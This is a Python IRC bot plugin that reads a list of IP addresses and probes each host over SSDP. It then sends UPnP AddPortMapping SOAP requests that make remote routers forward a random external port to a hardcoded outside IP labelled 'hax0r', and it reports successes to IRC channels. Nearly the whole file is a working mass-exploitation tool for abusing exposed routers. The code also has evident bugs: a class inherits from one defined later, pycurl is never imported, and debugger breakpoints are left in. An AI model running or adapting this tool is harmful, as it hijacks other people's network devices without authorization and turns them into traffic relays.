# -*- coding: utf-8 -*-
from irc3.plugins.command import command
import irc3

import socket
import pdb
from io import BytesIO
from random import randint
from urllib import request
import re

VERBOSE = True
LOGFILE = 'log.txt'
DATABASE = 'list.txt'
MSG = '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" \
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping \
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost>\
<NewExternalPort>{EPORT}</NewExternalPort><NewProtocol>TCP</NewProtocol>\
<NewInternalPort>{IPORT}</NewInternalPort><NewInternalClient>{IP}</NewInternalClient>\
<NewEnabled>1</NewEnabled><NewPortMappingDescription>{DESC}</NewPortMappingDescription>\
<NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>'

class upnp(Plugin):
    def __init__(self, ip, port=1900, mx=1, timeout=1):
        self.LOGFILE = LOGFILE
        self.MSG = MSG
        self.ip = ip
        self.port = port
        self.mx = mx
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
        self.socket.settimeout(timeout)
        self.bot.privmsg('#b0ts3x','inheritance test')
        pdb.set_trace()
        self.__run__()
    def log(self,s):
        f = open(self.LOGFILE,'a')
        f.write('{}\n'.format(s))
        f.close()
        print(s)
        self.bot.privmsg('#security',s)
    def __run__(self):
        services = [ 'ssdp:all', 'upnp:rootdevice' ]
        for service in services:
            msg = 'M-SEARCH * HTTP/1.1\r\n' \
                'HOST:239.255.255.250:1900\r\n' \
                'ST:{st}\r\n' \
                'MX:{mx}\r\n' \
                'MAN:"ssdp:discover"\r\n' \
                 '\r\n'
            msg = msg.format(st=service, mx=self.mx)
            self.log('{} {}:1900'.format('#'*60, self.ip))
            self.log(msg)
            data_blob = ""
            self.socket.sendto(msg.encode('utf-8'), (self.ip, int(self.port)) )
            try:
                while True:
                    data, _ = self.socket.recvfrom(65507)
                    data = str(data,'utf-8')
                    data_blob = data_blob + data
            except socket.timeout:
                pass
            except UnicodeDecodeError:
                self.log('#ERROR: Unicode Decode Error\n')
        result = data_blob.splitlines()
        url = ''
        for i in result:
            self.log(i)
            if(i.find('LOCATION') != -1 or i.find('Location') != -1):
                url = i[len('LOCATION: '):]
        if not url == '':
            ip = self.ip
            url = url[len('http://'):]
            url = 'http://' + ip + url[url.find(':'):]
            buffer = BytesIO()
            try:
                c = pycurl.Curl()
                c.setopt(c.URL, url)
                c.setopt(c.TIMEOUT, 1)
                c.setopt(c.WRITEFUNCTION, buffer.write)
                c.perform()
                c.close()
            except:
                return
            body = buffer.getvalue()
            if(str(body,'utf-8')[2:]=='invalid request'):
                self.log('#ERROR: invalid request\n')
                return
            self.log(str(body,'utf-8'))
            key = '<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>'
            pos = str(body,'utf-8').find(key)
            pos += len(key)
            _body = body[pos:]
            key = '<controlURL>'
            pos = str(_body,'utf-8').find(key)
            pos += len(key)
            pop = pos
            key = '</controlURL>'
            pos = str(_body,'utf-8').find(key)
            target = str(_body[pop:pos],'utf-8')
            self.log('#POPPED: {}'.format(target))
            min = 1024
            max = 65535
            p_ip = '168.235.75.229'
            p_eport = randint(min,max)
            p_iport = 80
            p_description = 'hax0r'
            MSG = self.MSG.format(IP=p_ip, EPORT=p_eport, IPORT=p_iport, DESC=p_description)
            MSG = MSG.encode('utf-8')
            url = url[len('http://'):]
            url = url[:url.find('/')] + target
            url = 'http://' + url
            self.log('\nurl: {}\n'.format(url))
            r = request.Request(url, MSG)
            r.add_header('SOAPAction', '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"')
            r.add_header('Content-type', 'application/xml')
            self.log('HEADERS: {}'.format(r.headers))
            self.log('PAYLOAD: {}'.format(str(r.data,'utf-8')))
            try:
                req = request.urlopen(r)
                url = "http://{IP}:{PORT}/".format(IP=ip, PORT=p_eport)
                buffer = BytesIO()
                try:
                    c = pycurl.Curl()
                    c.setopt(c.URL, url)
                    c.setopt(pycurl.TIMEOUT, 1)
                    c.setopt(c.WRITEFUNCTION, buffer.write)
                    c.perform()
                    c.close()
                except:
                    return
                body = buffer.getvalue()
                body = str(body, 'utf-8').splitlines()
                for line in body:
                    self.log(line)
                self.log("{}".format('-'*60))
                self.log('#DOOT - {IP}:{EPORT} > {PIP}:{IPORT}'.format(IP=ip, EPORT=p_eport, PIP=p_ip, IPORT=p_iport))
                print('* * * * * A L A R M * * * * *{}'.format('\a'*5))
            except Exception as e:
                self.log("#ERROR: {}\n".format(e))

@irc3.plugin
class Plugin:

    def __init__(self, bot):
        self.bot = bot

    @irc3.event(irc3.rfc.JOIN)
    def say_online(self, mask, channel, **kw):
        """say online"""
        if mask.nick != self.bot.nick:
            self.bot.privmsg(channel, 'd0t %s!' % mask.nick)
        else:
            self.bot.privmsg(channel, 'online: here to serve')

    @command(permission='view')
    def echo(self, mask, target, args):
        """Echo
            %%echo <message>...
        """
        pdb.set_trace()
        yield ' '.join(args['<message>'])

    @command(permission='view')
    def speak(self, mask, target, args):
        """speak
            %%speak <message>
        """
        msg = args.get('<message>')
        self.bot.privmsg(target,msg)

    @command(permission='view')
    def load(self, mask, target, args):
        """load
            %%load
        """
        DATABASE='assets/list.txt'
        f = open(DATABASE,'r')
        lines = f.read().splitlines()
        f.close()
        ips=[]
        for line in lines:
            ips.append(line.split()[0])
        olen = len(ips)
        ips = list(set(ips))
        nlen = len(ips)
        msg = 'loaded: {} ips // {} were unique'.format(olen,nlen)
        self.bot.privmsg(target,msg)
        for ip in ips:
            try:
                if(socket.inet_aton(ip)):
                    i = upnp(ip)
            except Exception as e:
                pass
